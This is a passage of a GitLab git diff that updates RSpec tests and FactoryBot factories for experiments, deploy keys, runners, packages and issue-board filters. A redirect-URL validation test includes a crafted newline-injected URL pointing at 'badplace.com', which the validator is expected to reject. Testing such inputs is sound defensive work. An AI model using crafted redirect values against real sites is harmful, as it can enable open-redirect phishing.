non_existing_record_id) } + let(:group) { build(:group, id: non_existing_record_id) } + let(:actor) { user } + + let(:context) { { user: user, project: project, namespace: namespace } } + + it "includes those using the gitlab standard context" do + subject.track(:action) + + expect_snowplow_event( + category: 'namespaced/stub', + action: 'action', + user: user, + project: project, + namespace: namespace, + context: an_instance_of(Array) + ) + end + + it "falls back to using the group key" do + subject.context(namespace: nil, group: group) + + subject.track(:action) + + expect_snowplow_event( + category: 'namespaced/stub', + action: 'action', + user: user, + project: project, + namespace: group, + context: an_instance_of(Array) + ) + end + + context "with the actor key" do + it "provides it to the tracking call as the user" do + subject.context(user: nil, actor: actor) + + subject.track(:action) + + expect_snowplow_event( + category: 'namespaced/stub', + action: 'action', + user: actor, + project: project, + namespace: namespace, + context: an_instance_of(Array) + ) + end + + it "handles when it's not a user record" do + subject.context(user: nil, actor: nil) + + subject.track(:action) + + expect_snowplow_event( + category: 'namespaced/stub', + action: 'action', + project: project, + namespace: namespace, + context: an_instance_of(Array) + ) + end + end + end end describe "#key_for" do it "generates MD5 hashes" do - expect(subject.key_for(foo: :bar)).to eq('6f9ac12afdb9b58c2f19a136d09f9153') + expect(application_experiment.key_for(foo: :bar)).to eq('6f9ac12afdb9b58c2f19a136d09f9153') end end @@ -251,31 +324,33 @@ RSpec.describe ApplicationExperiment, :experiment do "https://badplace.com\nhttps://gitlab.com" | nil 'https://gitlabbcom' | nil 'https://gitlabbcom/' | nil + 'http://gdk.test/foo/bar' | 'http://gdk.test/foo/bar' + 'http://localhost:3000/foo/bar' | 'http://localhost:3000/foo/bar' end with_them do it "returns the url or nil if invalid" do allow(Gitlab).to receive(:dev_env_or_com?).and_return(true) - expect(subject.process_redirect_url(url)).to eq(processed_url) + expect(application_experiment.process_redirect_url(url)).to eq(processed_url) end it "considers all urls invalid when not on dev or com" do allow(Gitlab).to receive(:dev_env_or_com?).and_return(false) - expect(subject.process_redirect_url(url)).to be_nil + expect(application_experiment.process_redirect_url(url)).to be_nil end end it "generates the correct urls based on where the engine was mounted" do - url = Rails.application.routes.url_helpers.experiment_redirect_url(subject, url: 'https://docs.gitlab.com') - expect(url).to include("/-/experiment/namespaced%2Fstub:#{subject.context.key}?https://docs.gitlab.com") + url = Rails.application.routes.url_helpers.experiment_redirect_url(application_experiment, url: 'https://docs.gitlab.com') + expect(url).to include("/-/experiment/namespaced%2Fstub:#{application_experiment.context.key}?https://docs.gitlab.com") end end context "when resolving variants" do it "uses the default value as specified in the yaml" do - expect(Feature).to receive(:enabled?).with('namespaced_stub', subject, type: :experiment, default_enabled: :yaml) + expect(Feature).to receive(:enabled?).with('namespaced_stub', application_experiment, type: :experiment, default_enabled: :yaml) - expect(subject.variant.name).to eq('control') + expect(application_experiment.variant.name).to eq('control') end context "when rolled out to 100%" do @@ -284,32 +359,52 @@ RSpec.describe ApplicationExperiment, :experiment do end it "returns the first variant name" do - subject.try(:variant1) {} - subject.try(:variant2) {} + application_experiment.try(:variant1) {} + application_experiment.try(:variant2) {} - expect(subject.variant.name).to eq('variant1') + expect(application_experiment.variant.name).to eq('variant1') end end end + context "when nesting experiments" do + before do + stub_experiments(top: :control, nested: :control) + end + + it "doesn't raise an exception" do + expect { experiment(:top) { |e| e.control { experiment(:nested) { } } } }.not_to raise_error + end + + it "tracks an event", :snowplow do + experiment(:top) { |e| e.control { experiment(:nested) { } } } + + expect(Gitlab::Tracking).to have_received(:event).with( # rubocop:disable RSpec/ExpectGitlabTracking + 'top', + 'nested', + hash_including(label: 'nested') + ) + end + end + context "when caching" do let(:cache) { Gitlab::Experiment::Configuration.cache } before do allow(Gitlab::Experiment::Configuration).to receive(:cache).and_call_original - cache.clear(key: subject.name) + cache.clear(key: application_experiment.name) - subject.use { } # setup the control - subject.try { } # setup the candidate + application_experiment.use { } # setup the control + application_experiment.try { } # setup the candidate end it "caches the variant determined by the variant resolver" do - expect(subject.variant.name).to eq('candidate') # we should be in the experiment + expect(application_experiment.variant.name).to eq('candidate') # we should be in the experiment - subject.run + application_experiment.run - expect(subject.cache.read).to eq('candidate') + expect(application_experiment.cache.read).to eq('candidate') end it "doesn't cache a variant if we don't explicitly provide one" do @@ -320,11 +415,11 @@ RSpec.describe ApplicationExperiment, :experiment do # the control. stub_feature_flags(namespaced_stub: false) # simulate being not rolled out - expect(subject.variant.name).to eq('control') # if we ask, it should be control + expect(application_experiment.variant.name).to eq('control') # if we ask, it should be control - subject.run + application_experiment.run - expect(subject.cache.read).to be_nil + expect(application_experiment.cache.read).to be_nil end it "caches a control variant if we assign it specifically" do @@ -332,27 +427,27 @@ RSpec.describe ApplicationExperiment, :experiment do # that this context will always get the control variant unless we delete # the field from the cache (or clear the entire experiment cache) -- or # write code that would specify a different variant. - subject.run(:control) + application_experiment.run(:control) - expect(subject.cache.read).to eq('control') + expect(application_experiment.cache.read).to eq('control') end context "arbitrary attributes" do before do - subject.cache.store.clear(key: subject.name + '_attrs') + application_experiment.cache.store.clear(key: application_experiment.name + '_attrs') end it "sets and gets attributes about an experiment" do - subject.cache.attr_set(:foo, :bar) + application_experiment.cache.attr_set(:foo, :bar) - expect(subject.cache.attr_get(:foo)).to eq('bar') + expect(application_experiment.cache.attr_get(:foo)).to eq('bar') end it "increments a value for an experiment" do - expect(subject.cache.attr_get(:foo)).to be_nil + expect(application_experiment.cache.attr_get(:foo)).to be_nil - expect(subject.cache.attr_inc(:foo)).to eq(1) - expect(subject.cache.attr_inc(:foo)).to eq(2) + expect(application_experiment.cache.attr_inc(:foo)).to eq(1) + expect(application_experiment.cache.attr_inc(:foo)).to eq(2) end end end diff --git a/spec/experiments/new_project_sast_enabled_experiment_spec.rb b/spec/experiments/new_project_sast_enabled_experiment_spec.rb index dcf71bfffd7..38f58c01973 100644 --- a/spec/experiments/new_project_sast_enabled_experiment_spec.rb +++ b/spec/experiments/new_project_sast_enabled_experiment_spec.rb @@ -4,7 +4,7 @@ require 'spec_helper' RSpec.describe NewProjectSastEnabledExperiment do it "defines the expected behaviors and variants" do - expect(subject.behaviors.keys).to match_array(%w[control candidate free_indicator]) + expect(subject.behaviors.keys).to match_array(%w[control candidate free_indicator unchecked_candidate]) end it "publishes to the database" do diff --git a/spec/factories/ci/pipelines.rb b/spec/factories/ci/pipelines.rb index 1d25964a4be..b2c1eff6fbd 100644 --- a/spec/factories/ci/pipelines.rb +++ b/spec/factories/ci/pipelines.rb @@ -18,15 +18,13 @@ FactoryBot.define do transient { child_of { nil } } transient { upstream_of { nil } } - before(:create) do |pipeline, evaluator| - pipeline.ensure_project_iid! - end - after(:build) do |pipeline, evaluator| if evaluator.child_of pipeline.project = evaluator.child_of.project pipeline.source = :parent_pipeline end + + pipeline.ensure_project_iid! end after(:create) do |pipeline, evaluator| diff --git a/spec/factories/clusters/agents/activity_events.rb b/spec/factories/clusters/agents/activity_events.rb new file mode 100644 index 00000000000..ff73f617964 --- /dev/null +++ b/spec/factories/clusters/agents/activity_events.rb @@ -0,0 +1,13 @@ +# frozen_string_literal: true + +FactoryBot.define do + factory :agent_activity_event, class: 'Clusters::Agents::ActivityEvent' do + association :agent, factory: :cluster_agent + association :agent_token, factory: :cluster_agent_token + user + + kind { :token_created } + level { :info } + recorded_at { Time.current } + end +end diff --git a/spec/factories/gpg_signature.rb b/spec/factories/commit_signature/gpg_signature.rb index 2ab4d190276..50a25291cc7 100644 --- a/spec/factories/gpg_signature.rb +++ b/spec/factories/commit_signature/gpg_signature.rb @@ -1,7 +1,7 @@ # frozen_string_literal: true FactoryBot.define do - factory :gpg_signature do + factory :gpg_signature, class: 'CommitSignatures::GpgSignature' do commit_sha { Digest::SHA1.hexdigest(SecureRandom.hex) } project gpg_key diff --git a/spec/factories/x509_commit_signature.rb b/spec/factories/commit_signature/x509_commit_signature.rb index a342b240690..1de92f56b33 100644 --- a/spec/factories/x509_commit_signature.rb +++ b/spec/factories/commit_signature/x509_commit_signature.rb @@ -1,7 +1,7 @@ # frozen_string_literal: true FactoryBot.define do - factory :x509_commit_signature do + factory :x509_commit_signature, class: 'CommitSignatures::X509CommitSignature' do commit_sha { Digest::SHA1.hexdigest(SecureRandom.hex) } project x509_certificate diff --git a/spec/factories/customer_relations/contacts.rb b/spec/factories/customer_relations/contacts.rb index 437f8feea48..821c45d7514 100644 --- a/spec/factories/customer_relations/contacts.rb +++ b/spec/factories/customer_relations/contacts.rb @@ -6,6 +6,7 @@ FactoryBot.define do first_name { generate(:name) } last_name { generate(:name) } + email { generate(:email) } trait :with_organization do organization diff --git a/spec/factories/deployments.rb b/spec/factories/deployments.rb index 2aab9764560..ab1b794632a 100644 --- a/spec/factories/deployments.rb +++ b/spec/factories/deployments.rb @@ -55,6 +55,10 @@ FactoryBot.define do status { :created } end + trait :blocked do + status { :blocked } + end + # This trait hooks the state maechine's events trait :succeed do after(:create) do |deployment, evaluator| diff --git a/spec/factories/gitlab/database/background_migration/batched_migrations.rb b/spec/factories/gitlab/database/background_migration/batched_migrations.rb index de57e0c1565..79b4447b76e 100644 --- a/spec/factories/gitlab/database/background_migration/batched_migrations.rb +++ b/spec/factories/gitlab/database/background_migration/batched_migrations.rb @@ -12,5 +12,13 @@ FactoryBot.define do sequence(:job_arguments) { |n| [["column_#{n}"], ["column_#{n}_convert_to_bigint"]] } total_tuple_count { 10_000 } pause_ms { 100 } + + trait :finished do + status { :finished } + end + + trait :failed do + status { :failed } + end end end diff --git a/spec/factories/import_failures.rb b/spec/factories/import_failures.rb index 376b2ff39e2..df0793664f4 100644 --- a/spec/factories/import_failures.rb +++ b/spec/factories/import_failures.rb @@ -10,6 +10,8 @@ FactoryBot.define do exception_class { 'RuntimeError' } exception_message { 'Something went wrong' } source { 'method_call' } + relation_key { 'issues' } + relation_index { 1 } correlation_id_value { SecureRandom.uuid } trait :hard_failure do diff --git a/spec/factories/issue_emails.rb b/spec/factories/issue_emails.rb new file mode 100644 index 00000000000..edf07aab0cd --- /dev/null +++ b/spec/factories/issue_emails.rb @@ -0,0 +1,8 @@ +# frozen_string_literal: true + +FactoryBot.define do + factory :issue_email, class: 'Issue::Email' do + issue + email_message_id { generate(:short_text) } + end +end diff --git a/spec/factories/namespaces.rb b/spec/factories/namespaces.rb index 959183f227d..2b3dabc07d8 100644 --- a/spec/factories/namespaces.rb +++ b/spec/factories/namespaces.rb @@ -1,12 +1,14 @@ # frozen_string_literal: true FactoryBot.define do - factory :namespace do + # This factory is called :namespace but actually maps (and always has) to User type + # See https://gitlab.com/gitlab-org/gitlab/-/merge_requests/74152#note_730034103 for context + factory :namespace, class: 'Namespaces::UserNamespace' do sequence(:name) { |n| "namespace#{n}" } + type { Namespaces::UserNamespace.sti_name } + path { name.downcase.gsub(/\s/, '_') } - # TODO: can this be moved into the :user_namespace factory? - # evaluate in issue https://gitlab.com/gitlab-org/gitlab/-/issues/341070 owner { association(:user, strategy: :build, namespace: instance, username: path) } trait :with_aggregation_schedule do diff --git a/spec/factories/notes.rb b/spec/factories/notes.rb index c15ec91d2ce..2159f5b2dc1 100644 --- a/spec/factories/notes.rb +++ b/spec/factories/notes.rb @@ -8,6 +8,7 @@ FactoryBot.define do note { generate(:title) } author { project&.creator || association(:user) } on_issue + updated_by { author } factory :note_on_commit, traits: [:on_commit] factory :note_on_issue, traits: [:on_issue], aliases: [:votable_note] diff --git a/spec/factories/packages/debian/component_file.rb b/spec/factories/packages/debian/component_file.rb index 9aee91b0973..eeba64ba5d2 100644 --- a/spec/factories/packages/debian/component_file.rb +++ b/spec/factories/packages/debian/component_file.rb @@ -27,8 +27,8 @@ FactoryBot.define do file_type { :packages } end - trait(:source) do - file_type { :source } + trait(:sources) do + file_type { :sources } architecture { nil } end diff --git a/spec/factories/packages/package_files.rb b/spec/factories/packages/package_files.rb index d9afbac1048..845fd882beb 100644 --- a/spec/factories/packages/package_files.rb +++ b/spec/factories/packages/package_files.rb @@ -323,6 +323,14 @@ FactoryBot.define do size { 1149.bytes } end + trait(:generic_zip) do + package + file_fixture { 'spec/fixtures/packages/generic/myfile.zip' } + file_name { "#{package.name}.zip" } + file_sha256 { '3559e770bd493b326e8ec5e6242f7206d3fbf94fa47c16f82d34a037daa113e5' } + size { 3989.bytes } + end + trait(:object_storage) do file_store { Packages::PackageFileUploader::Store::REMOTE } end diff --git a/spec/factories/packages/packages.rb b/spec/factories/packages/packages.rb index bb9aa95fe08..153518f4cd3 100644 --- a/spec/factories/packages/packages.rb +++ b/spec/factories/packages/packages.rb @@ -247,6 +247,12 @@ FactoryBot.define do sequence(:name) { |n| "generic-package-#{n}" } version { '1.0.0' } package_type { :generic } + + trait(:with_zip_file) do + after :create do |package| + create :package_file, :generic_zip, package: package + end + end end end end diff --git a/spec/factories/plan_limits.rb b/spec/factories/plan_limits.rb index b5921c1b311..ad10629af05 100644 --- a/spec/factories/plan_limits.rb +++ b/spec/factories/plan_limits.rb @@ -12,6 +12,7 @@ FactoryBot.define do trait :with_package_file_sizes do conan_max_file_size { 100 } + helm_max_file_size { 100 } maven_max_file_size { 100 } npm_max_file_size { 100 } nuget_max_file_size { 100 } diff --git a/spec/factories/projects.rb b/spec/factories/projects.rb index fb86f4672bc..981f10e8260 100644 --- a/spec/factories/projects.rb +++ b/spec/factories/projects.rb @@ -190,7 +190,7 @@ FactoryBot.define do end after :create do |project, evaluator| - raise "Failed to create repository!" unless project.create_repository + raise "Failed to create repository!" unless project.repository.exists? || project.create_repository evaluator.files.each do |filename, content| project.repository.create_file( diff --git a/spec/factories/protected_branches.rb b/spec/factories/protected_branches.rb index 2d3abc77350..bac1cf21596 100644 --- a/spec/factories/protected_branches.rb +++ b/spec/factories/protected_branches.rb @@ -2,7 +2,7 @@ FactoryBot.define do factory :protected_branch do - name + sequence(:name) { |n| "protected_branch_#{n}" } project transient do @@ -11,6 +11,20 @@ FactoryBot.define do default_access_level { true } end + trait :create_branch_on_repository do + association :project, factory: [:project, :repository] + + transient do + repository_branch_name { name } + end + + after(:create) do |protected_branch, evaluator| + project = protected_branch.project + + project.repository.create_branch(evaluator.repository_branch_name, project.default_branch_or_main) + end + end + trait :developers_can_push do transient do default_push_level { false } diff --git a/spec/factories/sequences.rb b/spec/factories/sequences.rb index 0edc2b6027d..893865962d8 100644 --- a/spec/factories/sequences.rb +++ b/spec/factories/sequences.rb @@ -2,7 +2,7 @@ FactoryBot.define do sequence(:username) { |n| "user#{n}" } - sequence(:name) { |n| "John Doe#{n}" } + sequence(:name) { |n| "Sidney Jones#{n}" } sequence(:email) { |n| "user#{n}@example.org" } sequence(:email_alias) { |n| "user.alias#{n}@example.org" } sequence(:title) { |n| "My title #{n}" } @@ -21,4 +21,5 @@ FactoryBot.define do sequence(:jira_branch) { |n| "feature/PROJ-#{n}" } sequence(:job_name) { |n| "job #{n}" } sequence(:work_item_type_name) { |n| "bug#{n}" } + sequence(:short_text) { |n| "someText#{n}" } end diff --git a/spec/factories/user_callouts.rb b/spec/factories/users/callouts.rb index cedc6efd8d7..d9f142fee6f 100644 --- a/spec/factories/user_callouts.rb +++ b/spec/factories/users/callouts.rb @@ -1,7 +1,7 @@ # frozen_string_literal: true FactoryBot.define do - factory :user_callout do + factory :callout, class: 'Users::Callout' do feature_name { :gke_cluster_integration } user diff --git a/spec/features/action_cable_logging_spec.rb b/spec/features/action_cable_logging_spec.rb index 2e6ce93f7f7..cf20b204cc5 100644 --- a/spec/features/action_cable_logging_spec.rb +++ b/spec/features/action_cable_logging_spec.rb @@ -25,7 +25,7 @@ RSpec.describe 'ActionCable logging', :js do username: user.username ) - expect(ActiveSupport::Notifications).to receive(:instrument).with('subscribe.action_cable', subscription_data) + expect(ActiveSupport::Notifications).to receive(:instrument).with('subscribe.action_cable', subscription_data).at_least(:once) gitlab_sign_in(user) visit project_issue_path(project, issue) diff --git a/spec/features/admin/admin_deploy_keys_spec.rb b/spec/features/admin/admin_deploy_keys_spec.rb index 53caf0fac33..9b74aa2ac5a 100644 --- a/spec/features/admin/admin_deploy_keys_spec.rb +++ b/spec/features/admin/admin_deploy_keys_spec.rb @@ -3,101 +3,125 @@ require 'spec_helper' RSpec.describe 'admin deploy keys' do + include Spec::Support::Helpers::ModalHelpers + let_it_be(:admin) { create(:admin) } let!(:deploy_key) { create(:deploy_key, public: true) } let!(:another_deploy_key) { create(:another_deploy_key, public: true) } before do - stub_feature_flags(admin_deploy_keys_vue: false) sign_in(admin) gitlab_enable_admin_mode_sign_in(admin) end - it 'show all public deploy keys' do - visit admin_deploy_keys_path + shared_examples 'renders deploy keys correctly' do + it 'show all public deploy keys' do + visit admin_deploy_keys_path - page.within(find('[data-testid="deploy-keys-list"]', match: :first)) do - expect(page).to have_content(deploy_key.title) - expect(page).to have_content(another_deploy_key.title) + page.within(find('[data-testid="deploy-keys-list"]', match: :first)) do + expect(page).to have_content(deploy_key.title) + expect(page).to have_content(another_deploy_key.title) + end end - end - it 'shows all the projects the deploy key has write access' do - write_key = create(:deploy_keys_project, :write_access, deploy_key: deploy_key) + it 'shows all the projects the deploy key has write access' do + write_key = create(:deploy_keys_project, :write_access, deploy_key: deploy_key) - visit admin_deploy_keys_path + visit admin_deploy_keys_path - page.within(find('[data-testid="deploy-keys-list"]', match: :first)) do - expect(page).to have_content(write_key.project.full_name) + page.within(find('[data-testid="deploy-keys-list"]', match: :first)) do + expect(page).to have_content(write_key.project.full_name) + end end - end - describe 'create a new deploy key' do - let(:new_ssh_key) { attributes_for(:key)[:key] } + describe 'create a new deploy key' do + let(:new_ssh_key) { attributes_for(:key)[:key] } - before do - visit admin_deploy_keys_path - click_link 'New deploy key' - end + before do + visit admin_deploy_keys_path + click_link 'New deploy key' + end - it 'creates a new deploy key' do - fill_in 'deploy_key_title', with: 'laptop' - fill_in 'deploy_key_key', with: new_ssh_key - click_button 'Create' + it 'creates a new deploy key' do + fill_in 'deploy_key_title', with: 'laptop' + fill_in 'deploy_key_key', with: new_ssh_key + click_button 'Create' - expect(current_path).to eq admin_deploy_keys_path + expect(current_path).to eq admin_deploy_keys_path - page.within(find('[data-testid="deploy-keys-list"]', match: :first)) do - expect(page).to have_content('laptop') + page.within(find('[data-testid="deploy-keys-list"]', match: :first)) do + expect(page).to have_content('laptop') + end end end - end - describe 'update an existing deploy key' do - before do - visit admin_deploy_keys_path - find('tr', text: deploy_key.title).click_link('Edit') - end + describe 'update an existing deploy key' do + before do + visit admin_deploy_keys_path + page.within('tr', text: deploy_key.title) do + click_link(_('Edit deploy key')) + end + end - it 'updates an existing deploy key' do - fill_in 'deploy_key_title', with: 'new-title' - click_button 'Save changes' + it 'updates an existing deploy key' do + fill_in 'deploy_key_title', with: 'new-title' + click_button 'Save changes' - expect(current_path).to eq admin_deploy_keys_path + expect(current_path).to eq admin_deploy_keys_path - page.within(find('[data-testid="deploy-keys-list"]', match: :first)) do - expect(page).to have_content('new-title') + page.within(find('[data-testid="deploy-keys-list"]', match: :first)) do + expect(page).to have_content('new-title') + end end end end - describe 'remove an existing deploy key' do - before do - visit admin_deploy_keys_path - end + context 'when `admin_deploy_keys_vue` feature flag is enabled', :js do + it_behaves_like 'renders deploy keys correctly' - it 'removes an existing deploy key' do - find('tr', text: deploy_key.title).click_link('Remove') + describe 'remove an existing deploy key' do + before do + visit admin_deploy_keys_path + end - expect(current_path).to eq admin_deploy_keys_path - page.within(find('[data-testid="deploy-keys-list"]', match: :first)) do - expect(page).not_to have_content(deploy_key.title) + it 'removes an existing deploy key' do + accept_gl_confirm('Are you sure you want to delete this deploy key?', button_text: 'Delete') do + page.within('tr', text: deploy_key.title) do + click_button _('Delete deploy key') + end + end + + expect(current_path).to eq admin_deploy_keys_path + page.within(find('[data-testid="deploy-keys-list"]', match: :first)) do + expect(page).not_to have_content(deploy_key.title) + end end end end - context 'when `admin_deploy_keys_vue` feature flag is enabled', :js do + context 'when `admin_deploy_keys_vue` feature flag is disabled' do before do - stub_feature_flags(admin_deploy_keys_vue: true) - - visit admin_deploy_keys_path + stub_feature_flags(admin_deploy_keys_vue: false) end - it 'renders the Vue app', :aggregate_failures do - expect(page).to have_content('Public deploy keys') - expect(page).to have_selector('[data-testid="deploy-keys-list"]') - expect(page).to have_link('New deploy key', href: new_admin_deploy_key_path) + it_behaves_like 'renders deploy keys correctly' + + describe 'remove an existing deploy key' do + before do + visit admin_deploy_keys_path + end + + it 'removes an existing deploy key' do + page.within('tr', text: deploy_key.title) do + click_link _('Remove deploy key') + end + + expect(current_path).to eq admin_deploy_keys_path + page.within(find('[data-testid="deploy-keys-list"]', match: :first)) do + expect(page).not_to have_content(deploy_key.title) + end + end end end end diff --git a/spec/features/admin/admin_labels_spec.rb b/spec/features/admin/admin_labels_spec.rb index 65de1160cfd..86d60b5d483 100644 --- a/spec/features/admin/admin_labels_spec.rb +++ b/spec/features/admin/admin_labels_spec.rb @@ -45,7 +45,7 @@ RSpec.describe 'admin issues labels' do wait_for_requests - expect(page).to have_content("There are no labels yet") + expect(page).to have_content("Define your default set of project labels") expect(page).not_to have_content('bug') expect(page).not_to have_content('feature_label') end diff --git a/spec/features/admin/admin_projects_spec.rb b/spec/features/admin/admin_projects_spec.rb index a50ef34d327..8938bab60d7 100644 --- a/spec/features/admin/admin_projects_spec.rb +++ b/spec/features/admin/admin_projects_spec.rb @@ -6,6 +6,7 @@ RSpec.describe "Admin::Projects" do include Spec::Support::Helpers::Features::MembersHelpers include Spec::Support::Helpers::Features::InviteMembersModalHelper include Select2Helper + include Spec::Support::Helpers::ModalHelpers let(:user) { create :user } let(:project) { create(:project) } @@ -39,7 +40,7 @@ RSpec.describe "Admin::Projects" do expect(page).to have_content(project.name) expect(page).to have_content(archived_project.name) - expect(page).to have_xpath("//span[@class='badge badge-warning']", text: 'archived') + expect(page).to have_xpath("//span[@class='gl-badge badge badge-pill badge-warning md']", text: 'archived') end it 'renders only archived projects', :js do @@ -145,7 +146,7 @@ RSpec.describe "Admin::Projects" do click_button 'Leave' end - page.within('[role="dialog"]') do + within_modal do click_button('Leave') end diff --git a/spec/features/admin/admin_runners_spec.rb b/spec/features/admin/admin_runners_spec.rb index 7e2751daefa..cc2d36221dc 100644 --- a/spec/features/admin/admin_runners_spec.rb +++ b/spec/features/admin/admin_runners_spec.rb @@ -4,6 +4,7 @@ require 'spec_helper' RSpec.describe "Admin Runners" do include StubENV + include Spec::Support::Helpers::ModalHelpers before do stub_env('IN_MEMORY_APPLICATION_SETTINGS', 'false') @@ -25,7 +26,7 @@ RSpec.describe "Admin Runners" do visit admin_runners_path expect(page).to have_text "Register an instance runner" - expect(page).to have_text "Runners currently online: 1" + expect(page).to have_text "Online Runners 1" end it 'with an instance runner shows an instance badge' do @@ -58,6 +59,55 @@ RSpec.describe "Admin Runners" do end end + it 'shows a job count' do + runner = create(:ci_runner, :project, projects: [project]) + + create(:ci_build, runner: runner) + create(:ci_build, runner: runner) + + visit admin_runners_path + + within "[data-testid='runner-row-#{runner.id}'] [data-label='Jobs']" do + expect(page).to have_content '2' + end + end + + describe 'delete runner' do + let!(:runner) { create(:ci_runner, description: 'runner-foo') } + + before do + visit admin_runners_path + + within "[data-testid='runner-row-#{runner.id}']" do + click_on 'Delete runner' + end + end + + it 'shows a confirmation modal' do + expect(page).to have_text "Delete runner ##{runner.id} (#{runner.short_sha})?" + expect(page).to have_text "Are you sure you want to continue?" + end + + it 'deletes a runner' do + within '.modal' do + click_on 'Delete runner' + end + + expect(page.find('.gl-toast')).to have_text(/Runner .+ deleted/) + expect(page).not_to have_content 'runner-foo' + end + + it 'cancels runner deletion' do + within '.modal' do + click_on 'Cancel' + end + + wait_for_requests + + expect(page).to have_content 'runner-foo' + end + end + describe 'search' do before do create(:ci_runner, :instance, description: 'runner-foo') @@ -323,7 +373,7 @@ RSpec.describe "Admin Runners" do it 'has all necessary texts including no runner message' do expect(page).to have_text "Register an instance runner" - expect(page).to have_text "Runners currently online: 0" + expect(page).to have_text "Online Runners 0" expect(page).to have_text 'No runners found' end end @@ -353,7 +403,7 @@ RSpec.describe "Admin Runners" do end it 'dismisses runner installation modal' do - page.within('[role="dialog"]') do + within_modal do click_button('Close', match: :first) end diff --git a/spec/features/admin/admin_settings_spec.rb b/spec/features/admin/admin_settings_spec.rb index 0a39baca259..29323c604ef 100644 --- a/spec/features/admin/admin_settings_spec.rb +++ b/spec/features/admin/admin_settings_spec.rb @@ -445,6 +445,24 @@ RSpec.describe 'Admin updates settings' do expect(current_settings.repository_storages_weighted).to eq('default' => 50) end + + context 'External storage for repository static objects' do + it 'changes Repository external storage settings' do + encrypted_token = Gitlab::CryptoHelper.aes256_gcm_encrypt('OldToken') + current_settings.update_attribute :static_objects_external_storage_auth_token_encrypted, encrypted_token + + visit repository_admin_application_settings_path + + page.within('.as-repository-static-objects') do + fill_in 'application_setting_static_objects_external_storage_url', with: 'http://example.com' + fill_in 'application_setting_static_objects_external_storage_auth_token', with: 'Token' + click_button 'Save changes' + end + + expect(current_settings.static_objects_external_storage_url).to eq('http://example.com') + expect(current_settings.static_objects_external_storage_auth_token).to eq('Token') + end + end end context 'Reporting page' do diff --git a/spec/features/admin/users/user_spec.rb b/spec/features/admin/users/user_spec.rb index 73477fb93dd..ae940fecabe 100644 --- a/spec/features/admin/users/user_spec.rb +++ b/spec/features/admin/users/user_spec.rb @@ -4,6 +4,7 @@ require 'spec_helper' RSpec.describe 'Admin::Users::User' do include Spec::Support::Helpers::Features::AdminUsersHelpers + include Spec::Support::Helpers::ModalHelpers let_it_be(:user) { create(:omniauth_user, provider: 'twitter', extern_uid: '123456') } let_it_be(:current_user) { create(:admin) } @@ -113,7 +114,7 @@ RSpec.describe 'Admin::Users::User' do click_action_in_user_dropdown(user_sole_owner_of_group.id, 'Delete user and contributions') - page.within('[role="dialog"]') do + within_modal do fill_in('username', with: user_sole_owner_of_group.name) click_button('Delete user and contributions') end @@ -426,7 +427,7 @@ RSpec.describe 'Admin::Users::User' do click_button 'Confirm user' - page.within('[role="dialog"]') do + within_modal do expect(page).to have_content("Confirm user #{unconfirmed_user.name}?") expect(page).to have_content('This user has an unconfirmed email address. You may force a confirmation.') diff --git a/spec/features/alert_management/alert_details_spec.rb b/spec/features/alert_management/alert_details_spec.rb index ce82b5adf8d..579b8221041 100644 --- a/spec/features/alert_management/alert_details_spec.rb +++ b/spec/features/alert_management/alert_details_spec.rb @@ -60,7 +60,7 @@ RSpec.describe 'Alert details', :js do expect(alert_status).to have_content('Triggered') - find('.btn-link').click + find('.gl-button').click find('.gl-new-dropdown-item', text: 'Acknowledged').click wait_for_requests @@ -79,7 +79,7 @@ RSpec.describe 'Alert details', :js do wait_for_requests - expect(alert_assignee).to have_content('Assignee Edit John Doe') + expect(alert_assignee).to have_content('Assignee Edit Sidney Jones') end end end diff --git a/spec/features/boards/board_filters_spec.rb b/spec/features/boards/board_filters_spec.rb new file mode 100644 index 00000000000..25e474bb676 --- /dev/null +++ b/spec/features/boards/board_filters_spec.rb @@ -0,0 +1,197 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe 'Issue board filters', :js do + let_it_be(:project) { create(:project, :repository) } + let_it_be(:user) { create(:user) } + let_it_be(:board) { create(:board, project: project) } + let_it_be(:project_label) { create(:label, project: project, title: 'Label') } + let_it_be(:milestone_1) { create(:milestone, project: project) } + let_it_be(:milestone_2) { create(:milestone, project: project) } + let_it_be(:release) { create(:release, tag: 'v1.0', project: project, milestones: [milestone_1]) } + let_it_be(:release_2) { create(:release, tag: 'v2.0', project: project, milestones: [milestone_2]) } + let_it_be(:issue_1) { create(:issue, project: project, milestone: milestone_1, author: user) } + let_it_be(:issue_2) { create(:labeled_issue, project: project, milestone: milestone_2, assignees: [user], labels: [project_label], confidential: true) } + let_it_be(:award_emoji1) { create(:award_emoji, name: 'thumbsup', user: user, awardable: issue_1) } + + let(:filtered_search) { find('[data-testid="issue_1-board-filtered-search"]') } + let(:filter_input) { find('.gl-filtered-search-term-input')} + let(:filter_dropdown) { find('.gl-filtered-search-suggestion-list') } + let(:filter_first_suggestion) { find('.gl-filtered-search-suggestion-list').first('.gl-filtered-search-suggestion') } + let(:filter_submit) { find('.gl-search-box-by-click-search-button') } + + before do + stub_feature_flags(issue_boards_filtered_search: true) + + project.add_maintainer(user) + sign_in(user) + + visit_project_board + end + + shared_examples 'loads all the users when opened' do + it 'and submit one as filter', :aggregate_failures do + expect(find('.board:nth-child(1)')).to have_selector('.board-card', count: 2) + + expect_filtered_search_dropdown_results(filter_dropdown, 3) + + click_on user.username + filter_submit.click + + expect(find('.board:nth-child(1)')).to have_selector('.board-card', count: 1) + expect(find('.board-card')).to have_content(issue.title) + end + end + + describe 'filters by assignee' do + before do + set_filter('assignee') + end + + it_behaves_like 'loads all the users when opened' do + let(:issue) { issue_2 } + end + end + + describe 'filters by author' do + before do + set_filter('author') + end + + it_behaves_like 'loads all the users when opened' do + let(:issue) { issue_1 } + end + end + + describe 'filters by label' do + before do + set_filter('label') + end + + it 'loads all the labels when opened and submit one as filter', :aggregate_failures do + expect(find('.board:nth-child(1)')).to have_selector('.board-card', count: 2) + + expect_filtered_search_dropdown_results(filter_dropdown, 3) + + filter_dropdown.click_on project_label.title + filter_submit.click + + expect(find('.board:nth-child(1)')).to have_selector('.board-card', count: 1) + expect(find('.board-card')).to have_content(issue_2.title) + end + end + + describe 'filters by releases' do + before do + set_filter('release') + end + + it 'loads all the releases when opened and submit one as filter', :aggregate_failures do + expect(find('.board:nth-child(1)')).to have_selector('.board-card', count: 2) + + expect_filtered_search_dropdown_results(filter_dropdown, 2) + + click_on release.tag + filter_submit.click + + expect(find('.board:nth-child(1)')).to have_selector('.board-card', count: 1) + expect(find('.board-card')).to have_content(issue_1.title) + end + end + + describe 'filters by confidentiality' do + before do + filter_input.click + filter_input.set("confidential:") + end + + it 'loads all the confidentiality options when opened and submit 